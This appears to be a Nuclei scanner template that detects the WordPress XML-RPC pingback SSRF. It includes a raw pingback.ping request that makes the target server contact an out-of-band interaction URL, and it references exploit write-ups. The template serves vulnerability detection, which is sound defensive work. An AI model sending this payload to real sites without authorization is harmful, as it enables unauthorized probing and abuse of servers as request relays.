nuclei-templates/vulnerabilities/wordpress/wp-xmlrpc-pingback-detectio...

39 lines
937 B
YAML
Raw Normal View History

id: wp-xmlrpc-pingback-detection
info:
name: Wordpress XMLRPC Pingback detection
author: pdteam
severity: info
reference:
- https://github.com/dorkerdevil/rpckiller
- https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
tags: wordpress,ssrf,oast,xmlrpc
requests:
- raw:
- |
POST /xmlrpc.php HTTP/1.1
Host: {{Hostname}}
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://{{interactsh-url}}</string>
</value>
</param>
<param>
<value>
<string>{{BaseURL}}/?p=1</string>
</value>
</param>
</params>
</methodCall>
matchers:
- type: word
part: interactsh_protocol
words:
- "http"